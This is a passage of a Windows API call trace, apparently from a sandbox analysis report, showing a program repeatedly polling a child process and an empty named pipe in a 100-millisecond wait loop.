lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.593] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.593] Sleep (dwMilliseconds=0x64) [0288.922] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0288.922] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0288.922] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0288.923] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0288.923] Sleep (dwMilliseconds=0x64) [0289.029] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0289.029] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0289.029] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.029] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.029] Sleep (dwMilliseconds=0x64) [0289.153] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0289.153] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0289.153] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.153] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.153] Sleep (dwMilliseconds=0x64) [0289.263] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0289.263] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0289.263] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.263] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.263] Sleep (dwMilliseconds=0x64) [0289.405] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0289.405] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0289.405] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.407] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.407] Sleep (dwMilliseconds=0x64) [0289.699] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0289.699] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0289.699] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.699] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.699] Sleep (dwMilliseconds=0x64) [0289.808] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0289.808] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0289.808] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.808] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.808] Sleep (dwMilliseconds=0x64) [0289.922] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0289.922] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0289.922] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.922] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0289.922] Sleep (dwMilliseconds=0x64) [0290.200] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0290.200] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0290.200] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.200] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.200] Sleep (dwMilliseconds=0x64) [0290.307] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0290.307] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0290.307] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.308] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.308] Sleep (dwMilliseconds=0x64) [0290.417] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0290.419] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0290.419] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.419] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.419] Sleep (dwMilliseconds=0x64) [0290.526] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0290.526] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0290.526] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.526] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.526] Sleep (dwMilliseconds=0x64) [0290.682] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0290.682] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0290.682] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.682] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.682] Sleep (dwMilliseconds=0x64) [0290.794] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0290.794] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0290.794] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.795] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.795] Sleep (dwMilliseconds=0x64) [0290.902] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0290.902] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0290.902] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.902] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0290.902] Sleep (dwMilliseconds=0x64) [0291.352] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0291.352] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0291.353] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0291.353] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0291.353] Sleep (dwMilliseconds=0x64) [0291.462] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0291.462] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0291.462] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0291.463] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0291.463] Sleep (dwMilliseconds=0x64) [0291.664] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0291.724] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0291.725] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0291.725] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0291.725] Sleep (dwMilliseconds=0x64) [0291.821] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0291.821] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0291.821] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0291.821] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0291.821] Sleep (dwMilliseconds=0x64) [0291.930] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0291.930] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0291.930] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0291.930] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0291.930] Sleep (dwMilliseconds=0x64) [0292.039] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0292.039] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0292.039] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.039] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.039] Sleep (dwMilliseconds=0x64) [0292.148] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0292.148] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0292.148] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.148] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.148] Sleep (dwMilliseconds=0x64) [0292.273] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0292.273] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0292.273] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.273] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.273] Sleep (dwMilliseconds=0x64) [0292.382] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0292.382] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0292.382] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.382] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.383] Sleep (dwMilliseconds=0x64) [0292.494] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0292.494] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0292.494] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.494] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.494] Sleep (dwMilliseconds=0x64) [0292.601] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0292.601] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0292.601] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.601] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.601] Sleep (dwMilliseconds=0x64) [0292.710] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0292.710] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0292.710] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.710] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.710] Sleep (dwMilliseconds=0x64) [0292.819] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0292.819] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0292.819] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.819] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0292.819] Sleep (dwMilliseconds=0x64) [0293.131] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0293.131] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0293.131] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0293.131] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, 